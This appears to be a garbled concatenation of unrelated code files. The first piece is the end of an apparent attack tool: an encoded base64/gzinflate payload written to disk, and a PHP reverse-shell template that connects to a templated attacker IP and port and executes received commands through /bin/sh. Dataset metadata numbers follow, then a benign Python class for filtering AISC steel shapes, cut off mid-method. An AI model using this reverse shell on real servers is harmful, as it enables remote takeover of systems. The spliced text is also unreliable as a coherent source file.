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
";
$evalCode = gzinflate(base64_decode($payload));
file_put_contents("%s", $evalCode);
%s""",
"else": """
ignore_user_abort(true);
ini_set("max_execution_time",0);
$ipaddr = "%s";
$port = "%s";
if(!function_exists('get_ini_value')) {
%s
}
$descriptorspec = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));
$cwd = getcwd();
$msg = php_uname()."\\nTemporary shall\\n";
$type = True;
if(!in_array('proc_open', @explode(',', get_ini_value('disable_functions')))){
$sock = fsockopen($ipaddr, $port);
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
die();
}
else{
$env = array("path" => "/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin");
}
if(function_exists("fsockopen")) {
$sock = fsockopen($ipaddr,$port);
} else {
$sock = socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
socket_connect($sock,$ipaddr,$port);
socket_write($sock,$msg);
$type = False;
}
fwrite($sock,$msg);
fwrite($sock,"[".getcwd()."]$ ");
while (True) {
if ($type == True){
$cmd = fread($sock,1024);
} else {
$cmd = socket_read($sock,1024);
}
if (substr($cmd,0,3) == "cd " and strlen($cmd) > 3) {
$cwd = trim(substr($cmd,3));
chdir($cwd);
$cwd = getcwd();
}
else if (trim(strtolower($cmd)) == "exit") {
break;
} else {
$process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);
if (is_resource($process)) {
fwrite($pipes[0],$cmd);
fclose($pipes[0]);
$msg = stream_get_contents($pipes[1]);
if ($type == True){
fwrite($sock,$msg);
} else {
socket_write($sock,$msg,strlen($msg));
}
fclose($pipes[1]);
$msg = stream_get_contents($pipes[2]);
if ($type == True){
fwrite($sock,$msg);
} else {
socket_write($sock,$msg,strlen($msg));
}
fclose($pipes[2]);
proc_close($process);
}
}
fwrite($sock,"[".getcwd()."]$ ");
}
if ($type == True){
fclose($sock);
} else {socket_close($sock);
}"""}
| 104.177778
| 6,018
| 0.750213
| 463
| 9,376
| 15.105832
| 0.617711
| 0.006005
| 0.005719
| 0.007721
| 0.025736
| 0.018587
| 0.018587
| 0.018587
| 0.018587
| 0.018587
| 0
| 0.13048
| 0.172782
| 9,376
| 89
| 6,019
| 105.348315
| 0.771274
| 0
| 0
| 0.258824
| 0
| 0.047059
| 0.991573
| 0.735147
| 0
| 1
| 0
| 0
| 0
| 1
| 0.011765
| true
| 0
| 0
| 0.011765
| 0.023529
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
022c20765654256eae561754e8e9df3ea95e189d
| 33,841
|
py
|
Python
|
steel/aisc_database_class.py
|
buddyd16/theToolbox
|
b04ca462595af1e90b7c2d1d35527aaf19664b0d
|
[
"BSD-3-Clause"
] | 1
|
2022-02-21T16:06:22.000Z
|
2022-02-21T16:06:22.000Z
|
steel/aisc_database_class.py
|
buddyd16/theToolbox
|
b04ca462595af1e90b7c2d1d35527aaf19664b0d
|
[
"BSD-3-Clause"
] | 2
|
2022-02-10T03:38:50.000Z
|
2022-03-02T14:52:43.000Z
|
steel/aisc_database_class.py
|
buddyd16/theToolbox
|
b04ca462595af1e90b7c2d1d35527aaf19664b0d
|
[
"BSD-3-Clause"
] | null | null | null |
'''
BSD 3-Clause License
Copyright (c) 2019-2022, Donald N. Bockoven III
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
class aisc_15th_database:
def __init__(self):
    """Load the AISC v15.0 shapes database plus its units and definitions CSVs.

    NOTE: the standard database provided by AISC needs to be cleaned up
    first - all '-' fields need to be replaced by 0's.
    """
    # context managers guarantee the files are closed even if parsing raises
    with open('steel/static/aisc_shapes_database_v15.0.csv', 'r') as file:
        data_raw = file.readlines()
    with open('steel/static/aisc_v15_units.csv', 'r') as file:
        units_raw = file.readlines()
    with open('steel/static/aisc_v15_defs.csv', 'r') as file:
        defs_raw = file.readlines()
    # units: a single CSV row, one unit string per property column
    self.units = units_raw[0].split(',')
    self.units[-1] = self.units[-1].rstrip('\n')
    # definitions: one [label, description, ...] row per property;
    # defs_only is padded with a leading '' so it aligns with the columns
    self.definitions = []
    self.defs_only = ['']
    for prop_def in defs_raw:
        prop_def = prop_def.split(',')
        prop_def[-1] = prop_def[-1].rstrip('\n')
        self.definitions.append(prop_def)
        self.defs_only.append(prop_def[1])
    # header row of the shapes database gives the property labels
    self.labels = data_raw[0].split(',')
    self.labels[-1] = self.labels[-1].rstrip('\n')
    self.shapes = []
    self.shape_types = []
    for shape in data_raw[1:]:
        shape = shape.split(',')
        shape[-1] = shape[-1].rstrip('\n')
        # split generic HSS rows into round/square/rectangular variants;
        # column 10 > 0 marks a round section (presumably the OD column -
        # TODO confirm against the v15 schema), otherwise equal columns
        # 8 and 13 mark a square section
        if shape[0] == 'HSS':
            if float(shape[10]) > 0:
                shape[0] = 'HSS-RND'
            elif shape[8] == shape[13]:
                shape[0] = 'HSS-SQR'
            else:
                shape[0] = 'HSS-RECT'
        self.shapes.append(shape)
        self.shape_types.append(shape[0])
    # de-duplicate the collected type tags
    self.shape_types = list(set(self.shape_types))
def WF(self, filter=[], filter2=[]):
shape_selection_list = []
filtered_shape_list = []
dictionary = []
if filter != []:
try:
filterpropindex = self.labels[0:83].index(filter[0])
filter_start = filter[1]
filter_end = filter[2]
except ValueError:
filter = []
if filter2 != []:
try:
filterpropindex2 = self.labels[0:83].index(filter2[0])
filter_start2 = filter2[1]
filter_end2 = filter2[2]
except ValueError:
filter2 = []
for shape in self.shapes:
if shape[0] == 'W':
if filter == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex]) >= filter_start and float(shape[filterpropindex]) <= filter_end):
if filter2 == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex2]) >= filter_start2 and float(shape[filterpropindex2]) <= filter_end2):
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
else:
pass
else:
pass
else:
pass
return shape_selection_list,filtered_shape_list,dictionary
def PIPE(self, filter=[], filter2=[]):
shape_selection_list = []
filtered_shape_list = []
dictionary = []
if filter != []:
try:
filterpropindex = self.labels[0:83].index(filter[0])
filter_start = filter[1]
filter_end = filter[2]
except ValueError:
filter = []
if filter2 != []:
try:
filterpropindex2 = self.labels[0:83].index(filter2[0])
filter_start2 = filter2[1]
filter_end2 = filter2[2]
except ValueError:
filter2 = []
for shape in self.shapes:
if shape[0] == 'PIPE':
if filter == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex]) >= filter_start and float(shape[filterpropindex]) <= filter_end):
if filter2 == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex2]) >= filter_start2 and float(shape[filterpropindex2]) <= filter_end2):
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
else:
pass
else:
pass
else:
pass
return shape_selection_list,filtered_shape_list,dictionary
def C(self, filter=[], filter2=[]):
shape_selection_list = []
filtered_shape_list = []
dictionary = []
if filter != []:
try:
filterpropindex = self.labels[0:83].index(filter[0])
filter_start = filter[1]
filter_end = filter[2]
except ValueError:
filter = []
if filter2 != []:
try:
filterpropindex2 = self.labels[0:83].index(filter2[0])
filter_start2 = filter2[1]
filter_end2 = filter2[2]
except ValueError:
filter2 = []
for shape in self.shapes:
if shape[0] == 'C':
if filter == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex]) >= filter_start and float(shape[filterpropindex]) <= filter_end):
if filter2 == []:
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
elif (float(shape[filterpropindex2]) >= filter_start2 and float(shape[filterpropindex2]) <= filter_end2):
shape_selection_list.append(shape[2])
filtered_shape_list.append(shape)
dictionary.append(dict(zip(self.labels[0:83],zip(shape[0:83],self.units[0:83],self.defs_only))))
else:
pass
else:
pass
else:
pass
return shape_selection_list,filtered_shape_list,dictionary
def HSS_RND(self, filter=None, filter2=None):
    """Select all 'HSS-RND' (round hollow structural section) shapes.

    filter / filter2 : optional ``[label, min, max]`` numeric range
    filters over the first 83 shape properties.  A label not present in
    ``self.labels`` silently disables that filter.  ``filter2`` is only
    applied in addition to a passing ``filter``; when ``filter`` is
    empty, ``filter2`` is ignored (historical behaviour, preserved).

    Returns ``(names, rows, dicts)``: the AISC manual labels (column 2),
    the full matching data rows, and one dict per row mapping each
    property label to a ``(value, unit, definition)`` tuple.
    """
    # None sentinels replace the old mutable-[] defaults; semantics match.
    filter = [] if filter is None else filter
    filter2 = [] if filter2 is None else filter2
    shape_selection_list = []
    filtered_shape_list = []
    dictionary = []
    labels = self.labels[0:83]
    units = self.units[0:83]
    if filter != []:
        try:
            idx1 = labels.index(filter[0])
            lo1, hi1 = filter[1], filter[2]
        except ValueError:
            filter = []  # unknown property label: drop the filter
    if filter2 != []:
        try:
            idx2 = labels.index(filter2[0])
            lo2, hi2 = filter2[1], filter2[2]
        except ValueError:
            filter2 = []  # unknown property label: drop the filter
    for shape in self.shapes:
        if shape[0] != 'HSS-RND':
            continue
        if filter != []:
            if not (lo1 <= float(shape[idx1]) <= hi1):
                continue
            if filter2 != [] and not (lo2 <= float(shape[idx2]) <= hi2):
                continue
        shape_selection_list.append(shape[2])
        filtered_shape_list.append(shape)
        dictionary.append(
            dict(zip(labels, zip(shape[0:83], units, self.defs_only))))
    return shape_selection_list, filtered_shape_list, dictionary
def MC(self, filter=None, filter2=None):
    """Select all 'MC' (Miscellaneous Channel) shapes.

    filter / filter2 : optional ``[label, min, max]`` numeric range
    filters over the first 83 shape properties.  A label not present in
    ``self.labels`` silently disables that filter.  ``filter2`` is only
    applied in addition to a passing ``filter``; when ``filter`` is
    empty, ``filter2`` is ignored (historical behaviour, preserved).

    Returns ``(names, rows, dicts)``: the AISC manual labels (column 2),
    the full matching data rows, and one dict per row mapping each
    property label to a ``(value, unit, definition)`` tuple.
    """
    # None sentinels replace the old mutable-[] defaults; semantics match.
    filter = [] if filter is None else filter
    filter2 = [] if filter2 is None else filter2
    shape_selection_list = []
    filtered_shape_list = []
    dictionary = []
    labels = self.labels[0:83]
    units = self.units[0:83]
    if filter != []:
        try:
            idx1 = labels.index(filter[0])
            lo1, hi1 = filter[1], filter[2]
        except ValueError:
            filter = []  # unknown property label: drop the filter
    if filter2 != []:
        try:
            idx2 = labels.index(filter2[0])
            lo2, hi2 = filter2[1], filter2[2]
        except ValueError:
            filter2 = []  # unknown property label: drop the filter
    for shape in self.shapes:
        if shape[0] != 'MC':
            continue
        if filter != []:
            if not (lo1 <= float(shape[idx1]) <= hi1):
                continue
            if filter2 != [] and not (lo2 <= float(shape[idx2]) <= hi2):
                continue
        shape_selection_list.append(shape[2])
        filtered_shape_list.append(shape)
        dictionary.append(
            dict(zip(labels, zip(shape[0:83], units, self.defs_only))))
    return shape_selection_list, filtered_shape_list, dictionary
def HSS_RECT(self, filter=None, filter2=None):
    """Select all 'HSS-RECT' (rectangular hollow structural section) shapes.

    filter / filter2 : optional ``[label, min, max]`` numeric range
    filters over the first 83 shape properties.  A label not present in
    ``self.labels`` silently disables that filter.  ``filter2`` is only
    applied in addition to a passing ``filter``; when ``filter`` is
    empty, ``filter2`` is ignored (historical behaviour, preserved).

    Returns ``(names, rows, dicts)``: the AISC manual labels (column 2),
    the full matching data rows, and one dict per row mapping each
    property label to a ``(value, unit, definition)`` tuple.
    """
    # None sentinels replace the old mutable-[] defaults; semantics match.
    filter = [] if filter is None else filter
    filter2 = [] if filter2 is None else filter2
    shape_selection_list = []
    filtered_shape_list = []
    dictionary = []
    labels = self.labels[0:83]
    units = self.units[0:83]
    if filter != []:
        try:
            idx1 = labels.index(filter[0])
            lo1, hi1 = filter[1], filter[2]
        except ValueError:
            filter = []  # unknown property label: drop the filter
    if filter2 != []:
        try:
            idx2 = labels.index(filter2[0])
            lo2, hi2 = filter2[1], filter2[2]
        except ValueError:
            filter2 = []  # unknown property label: drop the filter
    for shape in self.shapes:
        if shape[0] != 'HSS-RECT':
            continue
        if filter != []:
            if not (lo1 <= float(shape[idx1]) <= hi1):
                continue
            if filter2 != [] and not (lo2 <= float(shape[idx2]) <= hi2):
                continue
        shape_selection_list.append(shape[2])
        filtered_shape_list.append(shape)
        dictionary.append(
            dict(zip(labels, zip(shape[0:83], units, self.defs_only))))
    return shape_selection_list, filtered_shape_list, dictionary
def HP(self, filter=None, filter2=None):
    """Select all 'HP' (bearing pile) shapes.

    filter / filter2 : optional ``[label, min, max]`` numeric range
    filters over the first 83 shape properties.  A label not present in
    ``self.labels`` silently disables that filter.  ``filter2`` is only
    applied in addition to a passing ``filter``; when ``filter`` is
    empty, ``filter2`` is ignored (historical behaviour, preserved).

    Returns ``(names, rows, dicts)``: the AISC manual labels (column 2),
    the full matching data rows, and one dict per row mapping each
    property label to a ``(value, unit, definition)`` tuple.
    """
    # None sentinels replace the old mutable-[] defaults; semantics match.
    filter = [] if filter is None else filter
    filter2 = [] if filter2 is None else filter2
    shape_selection_list = []
    filtered_shape_list = []
    dictionary = []
    labels = self.labels[0:83]
    units = self.units[0:83]
    if filter != []:
        try:
            idx1 = labels.index(filter[0])
            lo1, hi1 = filter[1], filter[2]
        except ValueError:
            filter = []  # unknown property label: drop the filter
    if filter2 != []:
        try:
            idx2 = labels.index(filter2[0])
            lo2, hi2 = filter2[1], filter2[2]
        except ValueError:
            filter2 = []  # unknown property label: drop the filter
    for shape in self.shapes:
        if shape[0] != 'HP':
            continue
        if filter != []:
            if not (lo1 <= float(shape[idx1]) <= hi1):
                continue
            if filter2 != [] and not (lo2 <= float(shape[idx2]) <= hi2):
                continue
        shape_selection_list.append(shape[2])
        filtered_shape_list.append(shape)
        dictionary.append(
            dict(zip(labels, zip(shape[0:83], units, self.defs_only))))
    return shape_selection_list, filtered_shape_list, dictionary
def M(self, filter=None, filter2=None):
    """Select all 'M' (miscellaneous beam) shapes.

    filter / filter2 : optional ``[label, min, max]`` numeric range
    filters over the first 83 shape properties.  A label not present in
    ``self.labels`` silently disables that filter.  ``filter2`` is only
    applied in addition to a passing ``filter``; when ``filter`` is
    empty, ``filter2`` is ignored (historical behaviour, preserved).

    Returns ``(names, rows, dicts)``: the AISC manual labels (column 2),
    the full matching data rows, and one dict per row mapping each
    property label to a ``(value, unit, definition)`` tuple.
    """
    # None sentinels replace the old mutable-[] defaults; semantics match.
    filter = [] if filter is None else filter
    filter2 = [] if filter2 is None else filter2
    shape_selection_list = []
    filtered_shape_list = []
    dictionary = []
    labels = self.labels[0:83]
    units = self.units[0:83]
    if filter != []:
        try:
            idx1 = labels.index(filter[0])
            lo1, hi1 = filter[1], filter[2]
        except ValueError:
            filter = []  # unknown property label: drop the filter
    if filter2 != []:
        try:
            idx2 = labels.index(filter2[0])
            lo2, hi2 = filter2[1], filter2[2]
        except ValueError:
            filter2 = []  # unknown property label: drop the filter
    for shape in self.shapes:
        if shape[0] != 'M':
            continue
        if filter != []:
            if not (lo1 <= float(shape[idx1]) <= hi1):
                continue
            if filter2 != [] and not (lo2 <= float(shape[idx2]) <= hi2):
                continue
        shape_selection_list.append(shape[2])
        filtered_shape_list.append(shape)
        dictionary.append(
            dict(zip(labels, zip(shape[0:83], units, self.defs_only))))
    return shape_selection_list, filtered_shape_list, dictionary
def L(self, filter=None, filter2=None):
    """Select all 'L' (single angle) shapes.

    filter / filter2 : optional ``[label, min, max]`` numeric range
    filters over the first 83 shape properties.  A label not present in
    ``self.labels`` silently disables that filter.  ``filter2`` is only
    applied in addition to a passing ``filter``; when ``filter`` is
    empty, ``filter2`` is ignored (historical behaviour, preserved).

    Returns ``(names, rows, dicts)``: the AISC manual labels (column 2),
    the full matching data rows, and one dict per row mapping each
    property label to a ``(value, unit, definition)`` tuple.
    """
    # None sentinels replace the old mutable-[] defaults; semantics match.
    filter = [] if filter is None else filter
    filter2 = [] if filter2 is None else filter2
    shape_selection_list = []
    filtered_shape_list = []
    dictionary = []
    labels = self.labels[0:83]
    units = self.units[0:83]
    if filter != []:
        try:
            idx1 = labels.index(filter[0])
            lo1, hi1 = filter[1], filter[2]
        except ValueError:
            filter = []  # unknown property label: drop the filter
    if filter2 != []:
        try:
            idx2 = labels.index(filter2[0])
            lo2, hi2 = filter2[1], filter2[2]
        except ValueError:
            filter2 = []  # unknown property label: drop the filter
    for shape in self.shapes:
        if shape[0] != 'L':
            continue
        if filter != []:
            if not (lo1 <= float(shape[idx1]) <= hi1):
                continue
            if filter2 != [] and not (lo2 <= float(shape[idx2]) <= hi2):
                continue
        shape_selection_list.append(shape[2])
        filtered_shape_list.append(shape)
        dictionary.append(
            dict(zip(labels, zip(shape[0:83], units, self.defs_only))))
    return shape_selection_list, filtered_shape_list, dictionary
def ST(self, filter=None, filter2=None):
    """Select all 'ST' (structural tee cut from an S-shape) shapes.

    filter / filter2 : optional ``[label, min, max]`` numeric range
    filters over the first 83 shape properties.  A label not present in
    ``self.labels`` silently disables that filter.  ``filter2`` is only
    applied in addition to a passing ``filter``; when ``filter`` is
    empty, ``filter2`` is ignored (historical behaviour, preserved).

    Returns ``(names, rows, dicts)``: the AISC manual labels (column 2),
    the full matching data rows, and one dict per row mapping each
    property label to a ``(value, unit, definition)`` tuple.
    """
    # None sentinels replace the old mutable-[] defaults; semantics match.
    filter = [] if filter is None else filter
    filter2 = [] if filter2 is None else filter2
    shape_selection_list = []
    filtered_shape_list = []
    dictionary = []
    labels = self.labels[0:83]
    units = self.units[0:83]
    if filter != []:
        try:
            idx1 = labels.index(filter[0])
            lo1, hi1 = filter[1], filter[2]
        except ValueError:
            filter = []  # unknown property label: drop the filter
    if filter2 != []:
        try:
            idx2 = labels.index(filter2[0])
            lo2, hi2 = filter2[1], filter2[2]
        except ValueError:
            filter2 = []  # unknown property label: drop the filter
    for shape in self.shapes:
        if shape[0] != 'ST':
            continue
        if filter != []:
            if not (lo1 <= float(shape[idx1]) <= hi1):
                continue
            if filter2 != [] and not (lo2 <= float(shape[idx2]) <= hi2):
                continue
        shape_selection_list.append(shape[2])
        filtered_shape_list.append(shape)
        dictionary.append(
            dict(zip(labels, zip(shape[0:83], units, self.defs_only))))
    return shape_selection_list, filtered_shape_list, dictionary
def HSS_SQR(self, filter=None, filter2=None):
    """Select all 'HSS-SQR' (square hollow structural section) shapes.

    filter / filter2 : optional ``[label, min, max]`` numeric range
    filters over the first 83 shape properties.  A label not present in
    ``self.labels`` silently disables that filter.  ``filter2`` is only
    applied in addition to a passing ``filter``; when ``filter`` is
    empty, ``filter2`` is ignored (historical behaviour, preserved).

    Returns ``(names, rows, dicts)``: the AISC manual labels (column 2),
    the full matching data rows, and one dict per row mapping each
    property label to a ``(value, unit, definition)`` tuple.
    """
    # None sentinels replace the old mutable-[] defaults; semantics match.
    filter = [] if filter is None else filter
    filter2 = [] if filter2 is None else filter2
    shape_selection_list = []
    filtered_shape_list = []
    dictionary = []
    labels = self.labels[0:83]
    units = self.units[0:83]
    if filter != []:
        try:
            idx1 = labels.index(filter[0])
            lo1, hi1 = filter[1], filter[2]
        except ValueError:
            filter = []  # unknown property label: drop the filter
    if filter2 != []:
        try:
            idx2 = labels.index(filter2[0])
            lo2, hi2 = filter2[1], filter2[2]
        except ValueError:
            filter2 = []  # unknown property label: drop the filter
    for shape in self.shapes:
        if shape[0] != 'HSS-SQR':
            continue
        if filter != []:
            if not (lo1 <= float(shape[idx1]) <= hi1):
                continue
            if filter2 != [] and not (lo2 <= float(shape[idx2]) <= hi2):
                continue
        shape_selection_list.append(shape[2])
        filtered_shape_list.append(shape)
        dictionary.append(
            dict(zip(labels, zip(shape[0:83], units, self.defs_only))))
    return shape_selection_list, filtered_shape_list, dictionary
def MT(self, filter=None, filter2=None):
    """Select all 'MT' (tee cut from an M-shape) shapes.

